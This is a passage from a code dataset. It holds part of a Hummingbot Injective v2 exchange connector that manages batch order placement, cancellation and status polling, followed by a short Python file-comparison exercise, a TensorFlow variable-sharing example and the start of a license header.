exchange_order_id=exchange_order_id,\n                trading_pair=trading_pair,\n                order_type=order_type,\n                trade_type=trade_type,\n                amount=amount,\n                price=price,\n                creation_timestamp=self.current_timestamp,\n            )\n        )\n\n    def batch_order_create(self, orders_to_create: List[Union[MarketOrder, LimitOrder]]) -> List[LimitOrder]:\n        \"\"\"\n        Issues a batch order creation as a single API request for exchanges that implement this feature. The default\n        implementation of this method is to send the requests discretely (one by one).\n        :param orders_to_create: A list of LimitOrder or MarketOrder objects representing the orders to create. The order IDs\n            can be blank.\n        :returns: A list of LimitOrder or MarketOrder objects representing the created orders, complete with the generated\n            order IDs.\n        \"\"\"\n        orders_with_ids_to_create = []\n        for order in orders_to_create:\n            client_order_id = get_new_client_order_id(\n                is_buy=order.is_buy,\n                trading_pair=order.trading_pair,\n                hbot_order_id_prefix=self.client_order_id_prefix,\n                max_id_len=self.client_order_id_max_length,\n            )\n            orders_with_ids_to_create.append(order.copy_with_id(client_order_id=client_order_id))\n        safe_ensure_future(self._execute_batch_order_create(orders_to_create=orders_with_ids_to_create))\n        return orders_with_ids_to_create\n\n    def batch_order_cancel(self, orders_to_cancel: List[LimitOrder]):\n        \"\"\"\n        Issues a batch order cancelation as a single API request for exchanges that implement this feature. The default\n        implementation of this method is to send the requests discretely (one by one).\n        :param orders_to_cancel: A list of the orders to cancel.\n        \"\"\"\n        safe_ensure_future(coro=self._execute_batch_cancel(orders_to_cancel=orders_to_cancel))\n\n    async def cancel_all(self, timeout_seconds: float) -> List[CancellationResult]:\n        \"\"\"\n        Cancels all currently active orders. 
The cancellations are performed in parallel tasks.\n\n        :param timeout_seconds: the maximum time (in seconds) the cancel logic should run\n\n        :return: a list of CancellationResult instances, one for each of the orders to be cancelled\n        \"\"\"\n        incomplete_orders = {}\n        limit_orders = []\n        successful_cancellations = []\n\n        for order in self.in_flight_orders.values():\n            if not order.is_done:\n                incomplete_orders[order.client_order_id] = order\n                limit_orders.append(order.to_limit_order())\n\n        if len(limit_orders) > 0:\n            try:\n                async with timeout(timeout_seconds):\n                    cancellation_results = await self._execute_batch_cancel(orders_to_cancel=limit_orders)\n                    for cr in cancellation_results:\n                        if cr.success:\n                            del incomplete_orders[cr.order_id]\n                            successful_cancellations.append(CancellationResult(cr.order_id, True))\n            except Exception:\n                self.logger().network(\n                    \"Unexpected error cancelling orders.\",\n                    exc_info=True,\n                    app_warning_msg=\"Failed to cancel order. Check API key and network connection.\"\n                )\n        failed_cancellations = [CancellationResult(oid, False) for oid in incomplete_orders.keys()]\n        return successful_cancellations + failed_cancellations\n\n    async def cancel_all_subaccount_orders(self):\n        markets_ids = [await self.exchange_symbol_associated_to_pair(trading_pair=trading_pair)\n                       for trading_pair in self.trading_pairs]\n        await self._data_source.cancel_all_subaccount_orders(spot_markets_ids=markets_ids)\n\n    async def check_network(self) -> NetworkStatus:\n        \"\"\"\n        Checks connectivity with the exchange using the API\n        \"\"\"\n        try:\n            status = await self._data_source.check_network()\n        except asyncio.CancelledError:\n            raise\n        except Exception:\n            status = NetworkStatus.NOT_CONNECTED\n        return status\n\n    def trigger_event(self, event_tag: Enum, message: Any):\n        # Reimplemented because the Injective connector uses trading pairs with modified token names, since market\n        # tickers are not always unique.\n        # We need to change the original trading pair in all events to the real tokens trading pairs to not impact the\n        # bot events processing\n        trading_pair = getattr(message, \"trading_pair\", None)\n        if trading_pair is not None:\n            new_trading_pair = self._data_source.real_tokens_spot_trading_pair(unique_trading_pair=trading_pair)\n            if isinstance(message, tuple):\n                message = message._replace(trading_pair=new_trading_pair)\n            else:\n                setattr(message, \"trading_pair\", new_trading_pair)\n\n        super().trigger_event(event_tag=event_tag, message=message)\n\n    def _is_request_exception_related_to_time_synchronizer(self, request_exception: Exception) -> bool:\n        return False\n\n    def _is_order_not_found_during_status_update_error(self, status_update_exception: Exception) -> bool:\n        return CONSTANTS.ORDER_NOT_FOUND_ERROR_MESSAGE in str(status_update_exception)\n\n    def _is_order_not_found_during_cancelation_error(self, cancelation_exception: Exception) -> bool:\n        # For Injective the cancelation is done by sending a transaction to the chain.\n        # The cancel request is not validated until the transaction is included in a block, and so this does not apply\n        return False\n\n    async def _place_cancel(self, order_id: str, tracked_order: GatewayInFlightOrder):\n        # Not required because of _execute_order_cancel redefinition\n        raise NotImplementedError\n\n    async def _execute_order_cancel(self, order: GatewayInFlightOrder) -> str:\n        # Order cancelation requests for single orders are queued to be executed in batch if possible\n        self._orders_queued_to_cancel.append(order)\n        return None\n\n    async def _place_order(self, order_id: str, 
trading_pair: str, amount: Decimal, trade_type: TradeType,\n order_type: OrderType, price: Decimal, **kwargs) -> Tuple[str, float]:\n # Not required because of _place_order_and_process_update redefinition\n raise NotImplementedError\n\n async def _create_order(self,\n trade_type: TradeType,\n order_id: str,\n trading_pair: str,\n amount: Decimal,\n order_type: OrderType,\n price: Optional[Decimal] = None,\n **kwargs):\n \"\"\"\n Creates an order in the exchange using the parameters to configure it\n\n :param trade_type: the side of the order (BUY of SELL)\n :param order_id: the id that should be assigned to the order (the client id)\n :param trading_pair: the token pair to operate with\n :param amount: the order amount\n :param order_type: the type of order to create (MARKET, LIMIT, LIMIT_MAKER)\n :param price: the order price\n \"\"\"\n try:\n if price is None:\n calculated_price = self.get_price_for_volume(\n trading_pair=trading_pair,\n is_buy=trade_type == TradeType.BUY,\n volume=amount,\n ).result_price\n calculated_price = self.quantize_order_price(trading_pair, calculated_price)\n else:\n calculated_price = price\n\n await super()._create_order(\n trade_type=trade_type,\n order_id=order_id,\n trading_pair=trading_pair,\n amount=amount,\n order_type=order_type,\n price=calculated_price,\n ** kwargs\n )\n\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n self._on_order_failure(\n order_id=order_id,\n trading_pair=trading_pair,\n amount=amount,\n trade_type=trade_type,\n order_type=order_type,\n price=price,\n exception=ex,\n **kwargs,\n )\n\n async def _place_order_and_process_update(self, order: GatewayInFlightOrder, **kwargs) -> str:\n # Order creation requests for single orders are queued to be executed in batch if possible\n self._orders_queued_to_create.append(order)\n return None\n\n async def _execute_batch_order_create(self, orders_to_create: List[Union[MarketOrder, LimitOrder]]):\n inflight_orders_to_create = []\n for order in orders_to_create:\n valid_order = await self._start_tracking_and_validate_order(\n trade_type=TradeType.BUY if order.is_buy else TradeType.SELL,\n order_id=order.client_order_id,\n trading_pair=order.trading_pair,\n amount=order.quantity,\n order_type=order.order_type(),\n price=order.price,\n )\n if valid_order is not None:\n inflight_orders_to_create.append(valid_order)\n await self._execute_batch_inflight_order_create(inflight_orders_to_create=inflight_orders_to_create)\n\n async def _execute_batch_inflight_order_create(self, inflight_orders_to_create: List[GatewayInFlightOrder]):\n try:\n place_order_results = await self._data_source.create_orders(\n spot_orders=inflight_orders_to_create\n )\n for place_order_result, in_flight_order in (\n zip(place_order_results, inflight_orders_to_create)\n ):\n if place_order_result.exception:\n self._on_order_creation_failure(\n order_id=in_flight_order.client_order_id,\n trading_pair=in_flight_order.trading_pair,\n amount=in_flight_order.amount,\n trade_type=in_flight_order.trade_type,\n order_type=in_flight_order.order_type,\n price=in_flight_order.price,\n exception=place_order_result.exception,\n )\n else:\n self._update_order_after_creation_success(\n exchange_order_id=place_order_result.exchange_order_id,\n order=in_flight_order,\n update_timestamp=self.current_timestamp,\n misc_updates=place_order_result.misc_updates,\n )\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n self.logger().network(\"Batch order create failed.\")\n for order in inflight_orders_to_create:\n 
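# The batch request itself failed to be sent, so flag every order queued in it as failed.\n                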
self._on_order_creation_failure(\n order_id=order.client_order_id,\n trading_pair=order.trading_pair,\n amount=order.amount,\n trade_type=order.trade_type,\n order_type=order.order_type,\n price=order.price,\n exception=ex,\n )\n\n async def _start_tracking_and_validate_order(\n self,\n trade_type: TradeType,\n order_id: str,\n trading_pair: str,\n amount: Decimal,\n order_type: OrderType,\n price: Optional[Decimal] = None,\n **kwargs\n ) -> Optional[GatewayInFlightOrder]:\n trading_rule = self._trading_rules[trading_pair]\n\n if price is None:\n calculated_price = self.get_price_for_volume(\n trading_pair=trading_pair,\n is_buy=trade_type == TradeType.BUY,\n volume=amount,\n ).result_price\n calculated_price = self.quantize_order_price(trading_pair, calculated_price)\n else:\n calculated_price = price\n\n price = self.quantize_order_price(trading_pair, calculated_price)\n amount = self.quantize_order_amount(trading_pair=trading_pair, amount=amount)\n\n self.start_tracking_order(\n order_id=order_id,\n exchange_order_id=None,\n trading_pair=trading_pair,\n order_type=order_type,\n trade_type=trade_type,\n price=price,\n amount=amount,\n **kwargs,\n )\n order = self._order_tracker.active_orders[order_id]\n\n if order_type not in self.supported_order_types():\n self.logger().error(f\"{order_type} is not in the list of supported order types\")\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n order = None\n elif amount < trading_rule.min_order_size:\n self.logger().warning(f\"{trade_type.name.title()} order amount {amount} is lower than the minimum order\"\n f\" size {trading_rule.min_order_size}. The order will not be created.\")\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n order = None\n elif price is not None and amount * price < trading_rule.min_notional_size:\n self.logger().warning(f\"{trade_type.name.title()} order notional {amount * price} is lower than the \"\n f\"minimum notional size {trading_rule.min_notional_size}. \"\n \"The order will not be created.\")\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n order = None\n\n return order\n\n def _update_order_after_creation_success(\n self,\n exchange_order_id: Optional[str],\n order: GatewayInFlightOrder,\n update_timestamp: float,\n misc_updates: Optional[Dict[str, Any]] = None\n ):\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=order.client_order_id,\n exchange_order_id=exchange_order_id,\n trading_pair=order.trading_pair,\n update_timestamp=update_timestamp,\n new_state=order.current_state,\n misc_updates=misc_updates,\n )\n self._order_tracker.process_order_update(order_update)\n\n def _on_order_creation_failure(\n self,\n order_id: str,\n trading_pair: str,\n amount: Decimal,\n trade_type: TradeType,\n order_type: OrderType,\n price: Optional[Decimal],\n exception: Exception,\n ):\n self.logger().network(\n f\"Error submitting {trade_type.name.lower()} {order_type.name.upper()} order to {self.name_cap} for \"\n f\"{amount} {trading_pair} {price}.\",\n exc_info=exception,\n app_warning_msg=f\"Failed to submit buy order to {self.name_cap}. 
Check API key and network connection.\"\n )\n self._update_order_after_creation_failure(order_id=order_id, trading_pair=trading_pair)\n\n def _update_order_after_creation_failure(self, order_id: str, trading_pair: str):\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=order_id,\n trading_pair=trading_pair,\n update_timestamp=self.current_timestamp,\n new_state=OrderState.FAILED,\n )\n self._order_tracker.process_order_update(order_update)\n\n async def _execute_batch_cancel(self, orders_to_cancel: List[LimitOrder]) -> List[CancellationResult]:\n results = []\n tracked_orders_to_cancel = []\n\n for order in orders_to_cancel:\n tracked_order = self._order_tracker.all_updatable_orders.get(order.client_order_id)\n if tracked_order is not None:\n tracked_orders_to_cancel.append(tracked_order)\n else:\n results.append(CancellationResult(order_id=order.client_order_id, success=False))\n\n if len(tracked_orders_to_cancel) > 0:\n results.extend(await self._execute_batch_order_cancel(orders_to_cancel=tracked_orders_to_cancel))\n\n return results\n\n async def _execute_batch_order_cancel(self, orders_to_cancel: List[GatewayInFlightOrder]) -> List[CancellationResult]:\n try:\n cancel_order_results = await self._data_source.cancel_orders(spot_orders=orders_to_cancel)\n cancelation_results = []\n for cancel_order_result in cancel_order_results:\n success = True\n if cancel_order_result.not_found:\n self.logger().warning(\n f\"Failed to cancel the order {cancel_order_result.client_order_id} due to the order\"\n f\" not being found.\"\n )\n await self._order_tracker.process_order_not_found(\n client_order_id=cancel_order_result.client_order_id\n )\n success = False\n elif cancel_order_result.exception is not None:\n self.logger().error(\n f\"Failed to cancel order {cancel_order_result.client_order_id}\",\n exc_info=cancel_order_result.exception,\n )\n success = False\n else:\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=cancel_order_result.client_order_id,\n trading_pair=cancel_order_result.trading_pair,\n update_timestamp=self.current_timestamp,\n new_state=(OrderState.CANCELED\n if self.is_cancel_request_in_exchange_synchronous\n else OrderState.PENDING_CANCEL),\n misc_updates=cancel_order_result.misc_updates,\n )\n self._order_tracker.process_order_update(order_update)\n cancelation_results.append(\n CancellationResult(order_id=cancel_order_result.client_order_id, success=success)\n )\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().error(\n f\"Failed to cancel orders {', '.join([o.client_order_id for o in orders_to_cancel])}\",\n exc_info=True,\n )\n cancelation_results = [\n CancellationResult(order_id=order.client_order_id, success=False)\n for order in orders_to_cancel\n ]\n\n return cancelation_results\n\n def _update_order_after_cancelation_success(self, order: GatewayInFlightOrder):\n order_update: OrderUpdate = OrderUpdate(\n client_order_id=order.client_order_id,\n trading_pair=order.trading_pair,\n update_timestamp=self.current_timestamp,\n new_state=(OrderState.CANCELED\n if self.is_cancel_request_in_exchange_synchronous\n else OrderState.PENDING_CANCEL),\n )\n self._order_tracker.process_order_update(order_update)\n\n def _get_fee(self, base_currency: str, quote_currency: str, order_type: OrderType, order_side: TradeType,\n amount: Decimal, price: Decimal = s_decimal_NaN,\n is_maker: Optional[bool] = None) -> TradeFeeBase:\n is_maker = is_maker or (order_type is OrderType.LIMIT_MAKER)\n trading_pair = 
combine_to_hb_trading_pair(base=base_currency, quote=quote_currency)\n if trading_pair in self._trading_fees:\n fee_schema: TradeFeeSchema = self._trading_fees[trading_pair]\n fee_rate = fee_schema.maker_percent_fee_decimal if is_maker else fee_schema.taker_percent_fee_decimal\n fee = TradeFeeBase.new_spot_fee(\n fee_schema=fee_schema,\n trade_type=order_side,\n percent=fee_rate,\n percent_token=fee_schema.percent_fee_token,\n )\n else:\n fee = build_trade_fee(\n self.name,\n is_maker,\n base_currency=base_currency,\n quote_currency=quote_currency,\n order_type=order_type,\n order_side=order_side,\n amount=amount,\n price=price,\n )\n return fee\n\n async def _update_trading_fees(self):\n self._trading_fees = await self._data_source.get_spot_trading_fees()\n\n async def _user_stream_event_listener(self):\n while True:\n try:\n event_message = await self._all_trading_events_queue.get()\n channel = event_message[\"channel\"]\n event_data = event_message[\"data\"]\n\n if channel == \"transaction\":\n transaction_hash = event_data[\"hash\"]\n await self._check_created_orders_status_for_transaction(transaction_hash=transaction_hash)\n elif channel == \"trade\":\n trade_update = event_data\n tracked_order = self._order_tracker.all_fillable_orders_by_exchange_order_id.get(\n trade_update.exchange_order_id\n )\n if tracked_order is not None:\n new_trade_update = TradeUpdate(\n trade_id=trade_update.trade_id,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=trade_update.exchange_order_id,\n trading_pair=trade_update.trading_pair,\n fill_timestamp=trade_update.fill_timestamp,\n fill_price=trade_update.fill_price,\n fill_base_amount=trade_update.fill_base_amount,\n fill_quote_amount=trade_update.fill_quote_amount,\n fee=trade_update.fee,\n is_taker=trade_update.is_taker,\n )\n self._order_tracker.process_trade_update(new_trade_update)\n elif channel == \"order\":\n order_update = event_data\n tracked_order = self._order_tracker.all_updatable_orders_by_exchange_order_id.get(\n order_update.exchange_order_id)\n if tracked_order is not None:\n new_order_update = OrderUpdate(\n trading_pair=order_update.trading_pair,\n update_timestamp=order_update.update_timestamp,\n new_state=order_update.new_state,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=order_update.exchange_order_id,\n misc_updates=order_update.misc_updates,\n )\n self._order_tracker.process_order_update(order_update=new_order_update)\n elif channel == \"balance\":\n if event_data.total_balance is not None:\n self._account_balances[event_data.asset_name] = event_data.total_balance\n if event_data.available_balance is not None:\n self._account_available_balances[event_data.asset_name] = event_data.available_balance\n\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().exception(\"Unexpected error in user stream listener loop\")\n\n async def _format_trading_rules(self, exchange_info_dict: Dict[str, Any]) -> List[TradingRule]:\n # Not used in Injective\n raise NotImplementedError # pragma: no cover\n\n async def _update_trading_rules(self):\n await self._data_source.update_markets()\n await self._initialize_trading_pair_symbol_map()\n trading_rules_list = await self._data_source.spot_trading_rules()\n trading_rules = {}\n for trading_rule in trading_rules_list:\n trading_rules[trading_rule.trading_pair] = trading_rule\n self._trading_rules.clear()\n self._trading_rules.update(trading_rules)\n\n async def _update_balances(self):\n all_balances = await 
self._data_source.all_account_balances()\n\n self._account_available_balances.clear()\n self._account_balances.clear()\n\n for token, token_balance_info in all_balances.items():\n self._account_balances[token] = token_balance_info[\"total_balance\"]\n self._account_available_balances[token] = token_balance_info[\"available_balance\"]\n\n async def _all_trade_updates_for_order(self, order: GatewayInFlightOrder) -> List[TradeUpdate]:\n # Not required because of _update_orders_fills redefinition\n raise NotImplementedError\n\n async def _update_orders_fills(self, orders: List[GatewayInFlightOrder]):\n oldest_order_creation_time = self.current_timestamp\n all_market_ids = set()\n orders_by_hash = {}\n\n for order in orders:\n oldest_order_creation_time = min(oldest_order_creation_time, order.creation_timestamp)\n all_market_ids.add(await self.exchange_symbol_associated_to_pair(trading_pair=order.trading_pair))\n if order.exchange_order_id is not None:\n orders_by_hash[order.exchange_order_id] = order\n\n try:\n start_time = min(oldest_order_creation_time, self._latest_polled_order_fill_time)\n trade_updates = await self._data_source.spot_trade_updates(market_ids=all_market_ids, start_time=start_time)\n for trade_update in trade_updates:\n tracked_order = orders_by_hash.get(trade_update.exchange_order_id)\n if tracked_order is not None:\n new_trade_update = TradeUpdate(\n trade_id=trade_update.trade_id,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=trade_update.exchange_order_id,\n trading_pair=trade_update.trading_pair,\n fill_timestamp=trade_update.fill_timestamp,\n fill_price=trade_update.fill_price,\n fill_base_amount=trade_update.fill_base_amount,\n fill_quote_amount=trade_update.fill_quote_amount,\n fee=trade_update.fee,\n is_taker=trade_update.is_taker,\n )\n self._latest_polled_order_fill_time = max(self._latest_polled_order_fill_time, trade_update.fill_timestamp)\n self._order_tracker.process_trade_update(new_trade_update)\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n self.logger().warning(\n f\"Failed to fetch trade updates. 
Error: {ex}\",\n exc_info=ex,\n )\n\n async def _request_order_status(self, tracked_order: GatewayInFlightOrder) -> OrderUpdate:\n # Not required due to the redefinition of _update_orders_with_error_handler\n raise NotImplementedError\n\n async def _update_orders_with_error_handler(self, orders: List[GatewayInFlightOrder], error_handler: Callable):\n oldest_order_creation_time = self.current_timestamp\n all_market_ids = set()\n orders_by_hash = {}\n\n for order in orders:\n oldest_order_creation_time = min(oldest_order_creation_time, order.creation_timestamp)\n all_market_ids.add(await self.exchange_symbol_associated_to_pair(trading_pair=order.trading_pair))\n if order.exchange_order_id is not None:\n orders_by_hash[order.exchange_order_id] = order\n\n try:\n order_updates = await self._data_source.spot_order_updates(\n market_ids=all_market_ids,\n start_time=oldest_order_creation_time - self.LONG_POLL_INTERVAL\n )\n\n for order_update in order_updates:\n tracked_order = orders_by_hash.get(order_update.exchange_order_id)\n if tracked_order is not None:\n try:\n new_order_update = OrderUpdate(\n trading_pair=order_update.trading_pair,\n update_timestamp=order_update.update_timestamp,\n new_state=order_update.new_state,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=order_update.exchange_order_id,\n misc_updates=order_update.misc_updates,\n )\n\n if tracked_order.current_state == OrderState.PENDING_CREATE and new_order_update.new_state != OrderState.OPEN:\n open_update = OrderUpdate(\n trading_pair=order_update.trading_pair,\n update_timestamp=order_update.update_timestamp,\n new_state=OrderState.OPEN,\n client_order_id=tracked_order.client_order_id,\n exchange_order_id=order_update.exchange_order_id,\n misc_updates=order_update.misc_updates,\n )\n self._order_tracker.process_order_update(open_update)\n\n del orders_by_hash[order_update.exchange_order_id]\n self._order_tracker.process_order_update(new_order_update)\n except asyncio.CancelledError:\n raise\n except Exception as ex:\n await error_handler(tracked_order, ex)\n\n if len(orders_by_hash) > 0:\n # await self._data_source.check_order_hashes_synchronization(orders=orders_by_hash.values())\n for order in orders_by_hash.values():\n not_found_error = RuntimeError(\n f\"There was a problem updating order {order.client_order_id} \"\n f\"({CONSTANTS.ORDER_NOT_FOUND_ERROR_MESSAGE})\"\n )\n await error_handler(order, not_found_error)\n except asyncio.CancelledError:\n raise\n except Exception as request_error:\n for order in orders_by_hash.values():\n await error_handler(order, request_error)\n\n def _create_web_assistants_factory(self) -> WebAssistantsFactory:\n return WebAssistantsFactory(throttler=self._throttler)\n\n def _create_order_tracker(self) -> ClientOrderTracker:\n tracker = GatewayOrderTracker(connector=self)\n return tracker\n\n def _create_order_book_data_source(self) -> OrderBookTrackerDataSource:\n return InjectiveV2APIOrderBookDataSource(\n trading_pairs=self.trading_pairs,\n connector=self,\n data_source=self._data_source,\n domain=self.domain\n )\n\n def _create_user_stream_data_source(self) -> UserStreamTrackerDataSource:\n # Not used in Injective\n raise NotImplementedError # pragma: no cover\n\n def _is_user_stream_initialized(self):\n # Injective does not have private websocket endpoints\n return self._data_source.is_started()\n\n def _create_user_stream_tracker(self):\n # Injective does not use a tracker for the private streams\n return None\n\n def _create_user_stream_tracker_task(self):\n # 
Injective does not use a tracker for the private streams\n return None\n\n def _initialize_trading_pair_symbols_from_exchange_info(self, exchange_info: Dict[str, Any]):\n # Not used in Injective\n raise NotImplementedError() # pragma: no cover\n\n async def _initialize_trading_pair_symbol_map(self):\n exchange_info = None\n try:\n mapping = await self._data_source.spot_market_and_trading_pair_map()\n self._set_trading_pair_symbol_map(mapping)\n except Exception:\n self.logger().exception(\"There was an error requesting exchange info.\")\n return exchange_info\n\n def _configure_event_forwarders(self):\n event_forwarder = EventForwarder(to_function=self._process_user_trade_update)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=MarketEvent.TradeUpdate, listener=event_forwarder)\n\n event_forwarder = EventForwarder(to_function=self._process_user_order_update)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=MarketEvent.OrderUpdate, listener=event_forwarder)\n\n event_forwarder = EventForwarder(to_function=self._process_balance_event)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=AccountEvent.BalanceEvent, listener=event_forwarder)\n\n event_forwarder = EventForwarder(to_function=self._process_transaction_event)\n self._forwarders.append(event_forwarder)\n self._data_source.add_listener(event_tag=InjectiveEvent.ChainTransactionEvent, listener=event_forwarder)\n\n def _process_balance_event(self, event: BalanceUpdateEvent):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"balance\", \"data\": event}\n )\n\n def _process_user_order_update(self, order_update: OrderUpdate):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"order\", \"data\": order_update}\n )\n\n def _process_user_trade_update(self, trade_update: TradeUpdate):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"trade\", \"data\": trade_update}\n )\n\n def _process_transaction_event(self, transaction_event: Dict[str, Any]):\n self._last_received_message_timestamp = self._time()\n self._all_trading_events_queue.put_nowait(\n {\"channel\": \"transaction\", \"data\": transaction_event}\n )\n\n async def _check_orders_transactions(self):\n while True:\n try:\n await self._check_orders_creation_transactions()\n await self._sleep(CONSTANTS.TRANSACTIONS_CHECK_INTERVAL)\n except NotImplementedError:\n raise\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().exception(\"Unexpected error while running the transactions check process\", exc_info=True)\n await self._sleep(0.5)\n\n async def _check_orders_creation_transactions(self):\n orders: List[GatewayInFlightOrder] = self._order_tracker.active_orders.values()\n orders_by_creation_tx = defaultdict(list)\n orders_with_inconsistent_hash = []\n\n for order in orders:\n if order.creation_transaction_hash is not None and order.is_pending_create:\n orders_by_creation_tx[order.creation_transaction_hash].append(order)\n\n for transaction_hash, orders in orders_by_creation_tx.items():\n all_orders = orders.copy()\n try:\n order_updates = await self._data_source.order_updates_for_transaction(\n transaction_hash=transaction_hash, spot_orders=orders\n )\n\n for order_update in order_updates:\n tracked_order = 
self._order_tracker.active_orders.get(order_update.client_order_id)\n if tracked_order is not None:\n all_orders.remove(tracked_order)\n if (tracked_order.exchange_order_id is not None\n and tracked_order.exchange_order_id != order_update.exchange_order_id):\n tracked_order.update_exchange_order_id(order_update.exchange_order_id)\n orders_with_inconsistent_hash.append(tracked_order)\n self._order_tracker.process_order_update(order_update=order_update)\n\n for not_found_order in all_orders:\n self._update_order_after_failure(\n order_id=not_found_order.client_order_id,\n trading_pair=not_found_order.trading_pair\n )\n\n except ValueError:\n self.logger().debug(f\"Transaction not included in a block yet ({transaction_hash})\")\n\n if len(orders_with_inconsistent_hash) > 0:\n async with self._data_source.order_creation_lock:\n active_orders = [\n order for order in self._order_tracker.active_orders.values()\n if order not in orders_with_inconsistent_hash and order.current_state == OrderState.PENDING_CREATE\n ]\n await self._data_source.reset_order_hash_generator(active_orders=active_orders)\n\n async def _check_created_orders_status_for_transaction(self, transaction_hash: str):\n transaction_orders = []\n order: GatewayInFlightOrder\n for order in self.in_flight_orders.values():\n if order.creation_transaction_hash == transaction_hash and order.is_pending_create:\n transaction_orders.append(order)\n\n if len(transaction_orders) > 0:\n order_updates = await self._data_source.order_updates_for_transaction(\n transaction_hash=transaction_hash, spot_orders=transaction_orders\n )\n\n for order_update in order_updates:\n tracked_order = self._order_tracker.active_orders.get(order_update.client_order_id)\n if (tracked_order is not None\n and tracked_order.exchange_order_id is not None\n and tracked_order.exchange_order_id != order_update.exchange_order_id):\n tracked_order.update_exchange_order_id(order_update.exchange_order_id)\n self._order_tracker.process_order_update(order_update=order_update)\n\n async def _process_queued_orders(self):\n while True:\n try:\n await self._cancel_and_create_queued_orders()\n sleep_time = (self.clock.tick_size * 0.5\n if self.clock is not None\n else self._orders_processing_delta_time)\n await self._sleep(sleep_time)\n except NotImplementedError:\n raise\n except asyncio.CancelledError:\n raise\n except Exception:\n self.logger().exception(\"Unexpected error while processing queued individual orders\", exc_info=True)\n await self._sleep(self.clock.tick_size * 0.5)\n\n async def _cancel_and_create_queued_orders(self):\n if len(self._orders_queued_to_cancel) > 0:\n orders = [order.to_limit_order() for order in self._orders_queued_to_cancel]\n self._orders_queued_to_cancel = []\n await self._execute_batch_cancel(orders_to_cancel=orders)\n if len(self._orders_queued_to_create) > 0:\n orders = self._orders_queued_to_create\n self._orders_queued_to_create = []\n await self._execute_batch_inflight_order_create(inflight_orders_to_create=orders)\n\n async def _get_last_traded_price(self, trading_pair: str) -> float:\n market_id = await self.exchange_symbol_associated_to_pair(trading_pair=trading_pair)\n last_price = await self._data_source.last_traded_price(market_id=market_id)\n return float(last_price)\n\n def _get_poll_interval(self, timestamp: float) -> float:\n last_recv_diff = timestamp - self._last_received_message_timestamp\n poll_interval = (\n self.SHORT_POLL_INTERVAL\n if last_recv_diff > self.TICK_INTERVAL_LIMIT\n else self.LONG_POLL_INTERVAL\n )\n return 
poll_interval\n","sub_path":"hummingbot/connector/exchange/injective_v2/injective_v2_exchange.py","file_name":"injective_v2_exchange.py","file_ext":"py","file_size_in_byte":47056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"306181441","text":"\"\"\"\nCreate two data files, each with a set of names, one per line.\n\tNow, write a program that reads both files and lists only those names that are in both files.\n\tThe two file names should be supplied on the command line.\n\"\"\"\n#!/usr/bin/env python3\nimport sys\n\nfile1 = open(sys.argv[1], 'r')\n\nfor line1 in file1:\n\tfile2 = open(sys.argv[2], 'r')\n\tfor line2 in file2:\n\t\tif line1 == line2:\n\t\t\tprint(line1, end=\"\")\n\tfile2.close()\n\nfile1.close()\n\n","sub_path":"Exercises/01_intro_Python3/eightFive.py","file_name":"eightFive.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"429325269","text":"\nimport numpy as np;\nimport tensorflow as tf;\n\n#-----------------------------------------------\n\ndef relu_layer(i):\n\n\tw = tf.get_variable('w', shape = (10, 10), initializer = tf.random_normal_initializer());\n\tb = tf.get_variable('b', shape = (1, 10), initializer = tf.random_normal_initializer());\n\n\tu = tf.matmul(i, w) + b;\n\to = tf.nn.relu(u);\n\n\treturn o;\n\n#-----------------------------------------------\n\ni = tf.placeholder(tf.float32, shape = (1, 10), name = 'i');\n\n#-----------------------------------------------\n\n# with tf.variable_scope('name')\n# with tf.variable_scope('name', resue = True)\n# with tf.variable_scope('name', initializer = initializer)\n\nwith tf.variable_scope('layer_1') as scope:\n\tlayer_1 = relu_layer(i);\n\nwith tf.variable_scope('layer_2') as scope:\n\tlayer_2 = relu_layer(layer_1);\n\n#-----------------------------------------------\n\nwith tf.Session() as session:\n\n\tsession.run(tf.initialize_all_variables());\n\n\tresult = session.run(layer_1, feed_dict = {i : np.zeros((1, 10))});\n\n\tsummary_writer = tf.train.SummaryWriter('tmp');\n\tsummary_writer.add_graph(session.graph);\n\n\tprint(result);","sub_path":"examples/tensorflow-basics/variable_sharing.py","file_name":"variable_sharing.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"187845520","text":"# Copyright (c) 2006, Mathieu Fenniak\n# Copyright (c) 2007, Ashish Kulkarni \n#\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * The name of the author may not be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED 